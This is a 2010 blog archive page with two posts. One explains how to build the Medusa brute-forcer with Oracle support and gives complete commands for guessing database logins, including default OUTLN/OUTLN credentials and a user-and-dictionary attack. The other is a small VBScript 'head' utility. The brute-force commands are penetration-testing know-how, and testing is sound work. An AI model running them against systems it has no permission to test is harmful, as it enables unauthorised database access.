TheInterW3bs.com

Just another guy griping on his blog

Archive for January, 2010

Brute forcing Oracle with Medusa

Jan 26

Posted by nick in Hacking

While I think Hydra is a great tool, it always seems to be a little flaky to me and I totally agree with the foofus guys that I doubt Hydra is always doing its job. So about a year ago I was testing some Oracle dbs and needed a “working” bruteforcer and came across Medusa. Since using Medusa I have stopped using Hydra because it seems to handle many more protocols and services than Hydra ever actually supported.
The instructions are on the wiki but I thought I would list them out here too.
Download Medusa from foofus.net . Do the standard

./configure --prefix=/stickit/whereever ; make; make install

If running Gentoo you can install the Pentoo Overlay and emerge Medusa that way.
You will also need the following packages. Here are the ebuilds in Gentoo’s portage.

app-admin/eselect-oracle
dev-db/oracle-instantclient-basic
dev-db/oracle-instantclient-sqlplus

Then to prep Medusa for Oracle support you need to get all your annoying environment variables set and install DBD::Oracle

export ORACLE_HOME=/usr/lib/oracle/10.2.0.3/client
export LD_PATH=/usr/lib/oracle/10.2.0.3/client/lib
export C_INCLUDE_PATH=/usr/lib/oracle/10.2.0.3/client/include/
export LD_LIBRARY_PATH=/usr/lib/oracle/10.2.0.3/client/lib
perl -MCPAN -e shell
install DBD::Oracle

DBD::Oracle installation failed for me so I did the following

cd ~.cpan/build/DBD-Oracle-*
perl Makefile.PL
make install

As of version 1.5 the oracle.pl script needs to be adjusted
…/medusa-1.5/src/modsrc/wrapper/oracle.pl – modify line 50 to be:

my $msg = "", $err = 0;

Then to run Medusa using specific creds, like OUTLN/OUTLN try something like

./medusa -M wrapper -h 192.168.0.1 -u OUTLN -p OUTLN -m TYPE:STDIN -m PROG:/usr/src/compiled/medusa-1.5/lib/medusa/modules/oracle.pl -m ARGS:"%H %U DatabaseSIDnameHere"

To have it read in a list of user and a dictionary try something like

./medusa -M wrapper -h 192.168.0.1 -U /tmp/ora-users.txt -P /tmp/bigdict.txt -t 3 -r 1 -f -F -O /tmp/medusa-oracle-output -v 6 -m TYPE:STDIN -m PROG:/usr/src/compiled/medusa-1.5/lib/medusa/modules/oracle.pl -m ARGS:"%H %U DatabaseSIDnameHere"

I have noticed sometimes you need to throttle Medusa a little so the db can properly respond before you throw another attempt at it.

No Comments

Head Command for Windows

Jan 17

Posted by nick in Forensics, Windows

I was looking for a way to do a head in Windows and didn’t want to use any third-party software and of course, it had to be on the commandline.  So like head I needed it to show X number of lines from the beginning.  I don’t know VBScript, so I am sure there is a better/cleaner way to write this but here is what I came up with.  If anyone knows an easier way please pass it on.

If WScript.Arguments.Count = 2 Then
FileName = WScript.Arguments.Item(0)
NumLines = WScript.Arguments.Item(1)
Else
Wscript.Echo "Usage: cscript.exe head.vbs filename NumberOfLines"
Wscript.Quit
End If

Const ForReading = 1

Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.OpenTextFile(FileName, ForReading)

Dim i
For i = 1 To NumLines
strNextLine = objFile.ReadLine
strLine = strNextLine
Wscript.Echo strLine
Next

objFile.Close
C:\dumps>type test.txt
line 1
line 2
line 3
line 4
line 5
line 6
line 7
line 8
line 9
line 10
line 11
C:\dumps>cscript //nologo head.vbs test.txt 8
line 1
line 2
line 3
line 4
line 5
line 6
line 7
line 8
No Comments